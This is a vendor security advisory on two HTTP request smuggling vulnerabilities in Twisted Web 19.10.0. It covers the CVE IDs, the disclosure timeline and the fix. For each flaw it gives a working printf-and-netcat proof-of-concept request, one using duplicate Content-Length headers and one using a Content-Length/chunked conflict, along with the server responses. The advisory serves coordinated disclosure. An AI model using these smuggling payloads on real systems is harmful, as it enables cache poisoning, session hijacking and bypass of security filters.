ADVISORY SUMMARY
The following document describes identified vulnerabilities in the Twisted application version 19.10.0.
Impact
Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses. By exploiting inconsistencies in HTTP message parsing, attackers can smuggle complete or partial secondary HTTP messages to a remote server to attack backend services or other users.
In this case, risk is highly contextual, it depends where and why Twisted is deployed in a given environment. The impact will vary depending on the business purpose of the service designed with Twisted.
For more information on the impact of HTTP request splitting vulnerabilities, please refer to the following:
- https://portswigger.net/web-security/request-smuggling
- https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
Risk Level
High
Affected Vendor
Product Vendor |
Product Name |
Affected Version |
| Twisted Matrix Labs | Twisted | 19.10.0 |
Product Description
Twisted is an event-driven networking engine written in Python. The project’s official website is https://twistedmatrix.com/. The latest version of the application is 20.3.0rc1, released on March 9, 2020.
Vulnerabilities List:
One vulnerability was identified within the Twisted application:
HTTP REQUEST SPLITTING [TWO INSTANCES]
Solution
Update to version 20.3.0rc1.
Credits
Jake Miller, Security Associate, Bishop Fox - [email protected]
Timeline
- Initial Discovery: 12/05/2019
- Contact with vendor: 12/09/2019
- Vendor acknowledged vulnerabilities: 12/09/2019
- Touch-base regarding disclosure; vendor optimistic of 3/9 patch deadline: 02/24/2020
- Following up on patch status: 03/03/2020
- Shared assigned CVE IDs with Twisted team: 03/04/2020
- Coordinated full-disclosure/release timeline: 3/06/2020
- Vendor released patched version 20.3.0rc1: 3/09/2020
- Vulnerabilities publicly disclosed: 03/11/2020
This vulnerability is described in the following sections.
VULNERABILITY
HTTP REQUEST SPLITTING
Two HTTP request splitting (AKA HTTP request smuggling) vulnerabilities were identified in the latest version of Twisted Web. Both issues arose from deviations from RFC 7230 (HTTP/1.1: Message Syntax and Routing). Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses.
To demonstrate the vulnerabilities, printf and netcat command examples are provided to construct raw HTTP messages as the client. For the server, I started Twisted Web 19.10.0 using twistd web --path . --port tcp: (Twisted Framework Python apps that use twistd.web are also affected).
CVE ID |
Security Risk |
Impact |
Access Vector |
| CVE-2020-10108 | High | HTTP Request Splitting | Remote, Other |
Instance #1
Double Content-Length Headers
When presented with two content-length headers, Twisted Web ignored the first header. When the second content-length was set to zero, it caused Twisted Web to interpret the request body as a pipelined request.
According to RFC 7230 Section 3.3.3#4, if a message is received with multiple content-length headers with differing value, then the server must reject the message with a 400 response.
Request
printf 'GET /doesnotexist HTTP/1.1\r\n'\ 'Content-Length: 56\r\n'\ 'Content-Length: 0\r\n'\ 'Host: test.example.com\r\n'\ '\r\n'\ 'GET /?opfdii=k58inf HTTP/1.1\r\n'\ 'Host: test.example.com\r\n'\ '\r\n' | nc 127.0.0.1 <port
Response
HTTP/1.1 404 Not Found
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:02:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 145
<html>
<head><title>404 - No Such Resource</title></head>
<body>
<h1>No Such Resource</h1>
<p>File not found.</p>
</body>
</html>
HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:02:45 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT
Hello
As shown above, both the /doesnotexist and the smuggled request to the base path [/] were successfully resolved.
CVE ID |
Security Risk |
Impact |
Access Vector |
| CVE-2020-10109 | High | HTTP Request Splitting | Remote, Other |
Instance #2
Differing Content-Length/Chunked Encoding
When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted by Twisted Web as a pipelined request.
According to RFC 7230 Section 3.3.3#3, if a message with both content-length and chunked encoding is accepted, transfer-encoding overrides the content-length.
Request
printf 'GET /?nkomd7=8h7pjm HTTP/1.1\r\n'\ 'Transfer-Encoding: chunked\r\n'\ 'Content-Length: 4\r\n'\ 'Content-Type: application/x-www-form-urlencoded\r\n'\ 'Host: test.example.com\r\n'\ '\r\n'\ '33\r\n'\ 'GET /?ab8c4i=deg3if HTTP/1.1\r\n'\ 'Content-Length: 5\r\n'\ 'Host: test.example.com\r\n'\ '\r\n'\ '\r\n'\ '0\r\n'\ '\r\n' | nc 127.0.0.1 <port>
Response
HTTP/1.1 200 OK Server: TwistedWeb/19.10.0 Date: Mon, 09 Dec 2019 17:04:19 GMT Accept-Ranges: bytes Content-Length: 6 Content-Type: text/html Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT Hello HTTP/1.1 200 OK Server: TwistedWeb/19.10.0 Date: Mon, 09 Dec 2019 17:04:19 GMT Accept-Ranges: bytes Content-Length: 6 Content-Type: text/html Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT Hello
As shown above, smuggled requests were interpreted by the Twisted server. The impact of these vulnerabilities can vary depending on the surrounding infrastructure and the purpose of the service implemented with Twisted.
Subscribe to Bishop Fox's Security Blog
Be first to learn about latest tools, advisories, and findings.
Thank You! You have been subscribed.
